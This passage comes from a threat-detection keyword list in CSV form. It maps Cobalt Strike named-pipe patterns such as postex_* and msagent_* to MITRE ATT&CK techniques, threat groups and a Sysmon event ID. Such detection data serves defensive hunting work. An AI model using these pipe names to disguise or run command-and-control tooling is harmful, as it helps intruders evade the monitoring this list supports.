- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\msagent_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\MsFteWds*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\msrpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\MSSE-*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\mypipe-*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\netlogon_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\ntsvcs*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\PGMessagePipe*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\postex_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\postex_ssh_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\samr_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\scerpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\SearchTextHarvester*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\spoolss_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\srvsvc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\status_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\UIA_PIPE*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\win\msrpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\winsock*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\Winsock2\CatalogChangeListener-*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\wkssvc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 